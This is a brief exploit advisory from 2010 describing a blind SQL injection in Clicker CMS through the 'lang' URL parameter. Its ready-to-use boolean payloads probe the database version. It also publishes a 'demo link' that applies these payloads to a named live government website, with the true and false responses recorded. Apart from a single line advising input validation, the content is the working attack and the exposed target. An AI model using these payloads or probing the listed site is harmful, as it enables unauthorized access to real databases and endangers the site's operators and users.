# Exploit Title: Clicker CMS Blind SQL Injection Vulnerability # Date: 2010-06-25 # Author: hacker@sr.gov.yu # Software Link: n/a # Version: n/a #################################################################### .:. Author : hacker@sr.gov.yu .:. Contact: hacker@evilzone.org, hacker@sr.gov.yu(MSN) .:. Home : www.evilzone.org, www.balcan-security.com .:. Script : Clicker CMS .:. Bug Type : Blind Sql Injection .:. Risk: High .:. Tested on : Windows & Linux #################################################################### ===[ Exploit ]=== .:. It was found that Clicker CMS does not validate properly the "lang" parameter value. http://server/index.php?lang=4[BSQLi] ===[ Example ]=== http://server/index.php?lang=4 and substring(@@version,1,1)=5-- (true or false) http://server/index.php?lang=4 and substring(@@version,1,1)=4-- (false or true) ===[ Solution ]=== .:. Input validation of "lang" parameter should be corrected. Greetz to ALL EVILZONE.org && BALCAN-SECURITY.com members!!! Pozdrav za sve iz Srbije!!! :-))) ------------------------------------------------------------------------------------------------------------------------ Demo link(remove it from public): http://www.fmpvs.gov.ba/index.php?lang=4 and substring(@@version,1,1)=5-- TRUE http://www.fmpvs.gov.ba/index.php?lang=4 and substring(@@version,1,1)=4-- FALSE